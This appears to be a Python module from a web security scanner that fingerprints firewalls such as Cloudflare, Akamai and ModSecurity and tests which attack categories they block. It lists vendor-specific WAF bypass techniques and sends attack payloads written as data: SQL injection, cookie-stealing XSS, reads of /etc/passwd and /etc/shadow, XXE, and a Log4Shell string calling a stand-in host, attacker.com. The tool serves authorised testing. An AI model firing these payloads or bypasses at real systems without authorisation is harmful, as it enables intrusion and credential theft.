"""
WAF Fingerprint & Adaptive Evasion Scanner.

Identifies the Web Application Firewall protecting a target and provides
evasion intelligence:
  - Active fingerprinting via trigger payloads
  - Passive fingerprinting via response headers/cookies
  - Vendor-specific bypass technique selection
  - WAF rule coverage testing
"""

import re
from urllib.parse import urljoin, quote

from secprobe.config import Severity
from secprobe.scanners.smart_scanner import SmartScanner
from secprobe.utils import normalize_url, print_status, print_finding


# ── WAF Fingerprints ─────────────────────────────────────────────
# (name, header_patterns, cookie_patterns, body_patterns, bypass_techniques)
WAF_SIGNATURES = [
    {
        "name": "Cloudflare",
        "headers": [("Server", r"cloudflare"), ("CF-RAY", r".+")],
        "cookies": [r"__cf_bm", r"cf_clearance"],
        "body": [r"Attention Required! \| Cloudflare", r"cloudflare-static"],
        "bypasses": [
            "Use IP-based access (find origin via historical DNS, Shodan, Censys)",
            "Chunked transfer encoding",
            "Unicode normalization bypass",
            "HTTP/2 header smuggling",
        ],
    },
    {
        "name": "AWS WAF",
        "headers": [("x-amzn-RequestId", r".+"), ("x-amz-cf-id", r".+")],
        "cookies": [r"aws-waf-token"],
        "body": [r"<html><head><title>403 Forbidden</title></head>"],
        "bypasses": [
            "Case alternation (SeLeCt instead of SELECT)",
            "JSON content-type bypass",
            "Chunked encoding",
            "Overlong UTF-8 encoding",
        ],
    },
    {
        "name": "Akamai (Kona/Ghost)",
        "headers": [("Server", r"AkamaiGHost"), ("X-Akamai-Transformed", r".+")],
        "cookies": [r"AKA_A2", r"akamai_"],
        "body": [r"Access Denied.*akamai", r"Reference #"],
        "bypasses": [
            "HPP (HTTP Parameter Pollution)",
            "Multipart form-data encoding",
            "Tab/newline insertion in SQL",
            "Double URL encoding",
        ],
    },
    {
        "name": "ModSecurity",
        "headers": [("Server", r"ModSecurity|NOYB")],
        "cookies": [],
        "body": [r"ModSecurity", r"Mod_Security", r"NOYB"],
        "bypasses": [
            "Inline comments in SQL (/*!50000 SELECT */)",
            "HPP for parameter splitting",
            "Null byte injection",
            "Alternate encoding (hex, Unicode)",
        ],
    },
    {
        "name": "Imperva (Incapsula)",
        "headers": [("X-CDN", r"Imperva|Incapsula")],
        "cookies": [r"incap_ses_", r"visid_incap_", r"nlbi_"],
        "body": [r"Incapsula incident", r"_Incapsula_Resource"],
        "bypasses": [
            "Alternate encoding (double URL encode)",
            "Protocol-level tricks (HTTP/0.9)",
            "JSON injection for XSS",
            "Mutation XSS payloads",
        ],
    },
    {
        "name": "F5 BIG-IP ASM",
        "headers": [("Server", r"BIG-IP|BigIP")],
        "cookies": [r"BIGipServer", r"TS[a-f0-9]"],
        "body": [r"The requested URL was rejected", r"BIG-IP"],
        "bypasses": [
            "Chunked transfer encoding",
            "HPP with duplicate parameters",
            "Comment injection in SQL/XSS",
            "Unicode normalization",
        ],
    },
    {
        "name": "Sucuri",
        "headers": [("Server", r"Sucuri"), ("X-Sucuri-ID", r".+")],
        "cookies": [r"sucuri_cloudproxy_"],
        "body": [r"Sucuri WebSite Firewall", r"sucuri\.net"],
        "bypasses": [
            "Access origin IP directly",
            "Alternate HTTP methods",
            "Overlong payloads",
            "Encoding tricks",
        ],
    },
    {
        "name": "Wordfence",
        "headers": [],
        "cookies": [r"wfwaf-authcookie"],
        "body": [r"wordfence", r"wfFunc", r"Generated by Wordfence"],
        "bypasses": [
            "IP rotation",
            "Slow request rate",
            "Alternate encoding",
            "Unusual HTTP methods",
        ],
    },
    {
        "name": "Barracuda",
        "headers": [],
        "cookies": [r"barra_counter_session", r"BNI_"],
        "body": [r"Barracuda"],
        "bypasses": [
            "HPP attacks",
            "Double encoding",
            "Chunked encoding",
        ],
    },
    {
        "name": "Fortinet FortiWeb",
        "headers": [],
        "cookies": [r"FORTIWAFSID"],
        "body": [r"FortiWeb", r"fortigate"],
        "bypasses": [
            "Unicode normalization",
            "JSON content-type tricks",
            "Chunked encoding",
        ],
    },
    {
        "name": "DDoS-Guard",
        "headers": [("Server", r"ddos-guard")],
        "cookies": [r"__ddg"],
        "body": [r"ddos-guard"],
        "bypasses": [
            "Wait for JS challenge to pass",
            "Use headless browser",
        ],
    },
    {
        "name": "Varnish",
        "headers": [("Via", r"varnish"), ("X-Varnish", r".+")],
        "cookies": [],
        "body": [],
        "bypasses": [
            "Cache poisoning",
            "Host header manipulation",
        ],
    },
]

# Trigger payloads to provoke WAF blocks
TRIGGER_PAYLOADS = [
    "<script>alert(1)</script>",
    "' OR 1=1 --",
    "../../etc/passwd",
    "${7*7}",
    "{{7*7}}",
    "; ls -la",
    "UNION SELECT 1,2,3--",
]


class WAFScanner(SmartScanner):
    name = "WAF Fingerprint Scanner"
    description = "Identify Web Application Firewall and provide adaptive evasion intelligence"

    def scan(self):
        url = normalize_url(self.config.target)
        print_status(f"WAF fingerprinting {url}", "progress")

        detected_wafs = []

        # ── Phase 1: Passive fingerprinting ───────────────────────
        print_status("Phase 1: Passive WAF fingerprinting (headers/cookies)", "progress")
        try:
            resp = self.http_client.get(url)
            for sig in WAF_SIGNATURES:
                confidence = self._check_passive(resp, sig)
                if confidence > 0:
                    detected_wafs.append((sig, confidence, "passive"))
        except Exception as e:
            self.result.error = str(e)
            return

        # ── Phase 2: Active fingerprinting ────────────────────────
        print_status("Phase 2: Active WAF fingerprinting (trigger payloads)", "progress")
        active_detections = self._active_fingerprint(url)
        for sig, confidence in active_detections:
            # Merge with passive results
            existing = [w for w in detected_wafs if w[0]["name"] == sig["name"]]
            if existing:
                # Increase confidence
                old_confidence = existing[0][1]
                detected_wafs = [w for w in detected_wafs if w[0]["name"] != sig["name"]]
                detected_wafs.append((sig, min(100, old_confidence + confidence), "passive+active"))
            else:
                detected_wafs.append((sig, confidence, "active"))

        # ── Phase 3: Report findings ──────────────────────────────
        print_status("Phase 3: Generating WAF intelligence report", "progress")

        if not detected_wafs:
            self.add_finding(
                title="No WAF detected",
                severity=Severity.MEDIUM,
                description=(
                    "No Web Application Firewall was detected protecting this target. "
                    "The application may be directly exposed to attack payloads without "
                    "any filtering layer."
                ),
                recommendation="Deploy a WAF (e.g., Cloudflare, AWS WAF, ModSecurity) to filter malicious traffic.",
                evidence="No WAF signatures found in headers, cookies, or responses",
                category="WAF Analysis",
                url=url,
                cwe="CWE-693",
            )
            print_finding(Severity.MEDIUM, "No WAF detected — application may be unprotected")
        else:
            # Sort by confidence
            detected_wafs.sort(key=lambda x: x[1], reverse=True)

            for sig, confidence, method in detected_wafs:
                bypasses = "\n".join(f"  • {b}" for b in sig["bypasses"])
                self.add_finding(
                    title=f"WAF detected: {sig['name']} (confidence: {confidence}%)",
                    severity=Severity.INFO,
                    description=(
                        f"Detected {sig['name']} WAF via {method} fingerprinting.\n"
                        f"Confidence: {confidence}%\n\n"
                        f"Known bypass techniques:\n{bypasses}"
                    ),
                    recommendation=(
                        f"Ensure {sig['name']} rules are up-to-date and properly configured. "
                        f"Review the bypass techniques above and test your rules against them."
                    ),
                    evidence=f"WAF: {sig['name']}\nMethod: {method}\nConfidence: {confidence}%",
                    category="WAF Analysis",
                    url=url,
                )
                print_finding(Severity.INFO, f"WAF: {sig['name']} ({confidence}% confidence)")

            # Store for other scanners to use
            self.result.raw_data["detected_wafs"] = [
                {"name": w[0]["name"], "confidence": w[1], "bypasses": w[0]["bypasses"]}
                for w in detected_wafs
            ]

        # ── Phase 4: WAF rule coverage test ───────────────────────
        print_status("Phase 4: WAF rule coverage testing", "progress")
        if detected_wafs:
            self._test_waf_coverage(url)

    def _check_passive(self, resp, sig):
        """Check response headers/cookies against WAF signature."""
        confidence = 0

        # Header checks
        for header_name, header_pattern in sig["headers"]:
            value = resp.headers.get(header_name, "")
            if re.search(header_pattern, value, re.I):
                confidence += 40

        # Cookie checks
        cookies = resp.headers.get("Set-Cookie", "") + str(resp.cookies)
        for cookie_pattern in sig["cookies"]:
            if re.search(cookie_pattern, cookies, re.I):
                confidence += 30

        # Body checks (only on error pages)
        for body_pattern in sig["body"]:
            if re.search(body_pattern, resp.text, re.I):
                confidence += 20

        return min(100, confidence)

    def _active_fingerprint(self, url):
        """Trigger WAF blocks and analyze the responses."""
        detections = []

        for payload in TRIGGER_PAYLOADS:
            test_url = f"{url}?test={quote(payload)}"
            try:
                resp = self.http_client.get(test_url, timeout=10)

                # Check if we got blocked (403, 406, 429, etc.)
                if resp.status_code in (403, 406, 429, 503):
                    for sig in WAF_SIGNATURES:
                        # Check response body for WAF fingerprints
                        for body_pattern in sig["body"]:
                            if re.search(body_pattern, resp.text, re.I):
                                detections.append((sig, 50))
                                break

                        # Check headers in block response
                        for header_name, header_pattern in sig["headers"]:
                            value = resp.headers.get(header_name, "")
                            if re.search(header_pattern, value, re.I):
                                detections.append((sig, 30))
                                break

            except Exception:
                pass

        # Deduplicate and combine confidence
        combined = {}
        for sig, conf in detections:
            name = sig["name"]
            if name in combined:
                combined[name] = (sig, min(100, combined[name][1] + conf))
            else:
                combined[name] = (sig, conf)

        return list(combined.values())

    def _test_waf_coverage(self, url):
        """Test what attack categories the WAF blocks."""
        test_categories = [
            ("SQL Injection", "' OR 1=1 UNION SELECT username,password FROM users--"),
            ("XSS", "<script>alert(document.cookie)</script>"),
            ("Path Traversal", "../../../../etc/shadow"),
            ("Command Injection", "; cat /etc/passwd"),
            ("SSTI", "{{7*'7'}}"),
            ("XXE", "<!DOCTYPE foo [<!ENTITY xxe SYSTEM 'file:///etc/passwd'>]>"),
            ("LDAP Injection", "*)(&(objectClass=*)"),
            ("Log4Shell", "${jndi:ldap://attacker.com/a}"),
        ]

        blocked = []
        passed = []

        for category, payload in test_categories:
            test_url = f"{url}?q={quote(payload)}"
            try:
                resp = self.http_client.get(test_url, timeout=10)
                if resp.status_code in (403, 406, 429, 501, 503):
                    blocked.append(category)
                else:
                    passed.append(category)
            except Exception:
                blocked.append(category)  # Assume connection reset = blocked

        if passed:
            self.add_finding(
                title=f"WAF rule gaps: {len(passed)} attack categories not blocked",
                severity=Severity.MEDIUM,
                description=(
                    f"The WAF did not block the following attack categories:\n"
                    + "\n".join(f"  ✗ {c}" for c in passed)
                    + f"\n\nBlocked categories:\n"
                    + "\n".join(f"  ✓ {c}" for c in blocked)
                ),
                recommendation="Review and update WAF rules to cover all attack categories.",
                evidence=f"Passed: {', '.join(passed)}\nBlocked: {', '.join(blocked)}",
                category="WAF Analysis",
                url=url,
                cwe="CWE-693",
            )
            print_finding(Severity.MEDIUM, f"WAF gaps: {', '.join(passed)} not blocked")
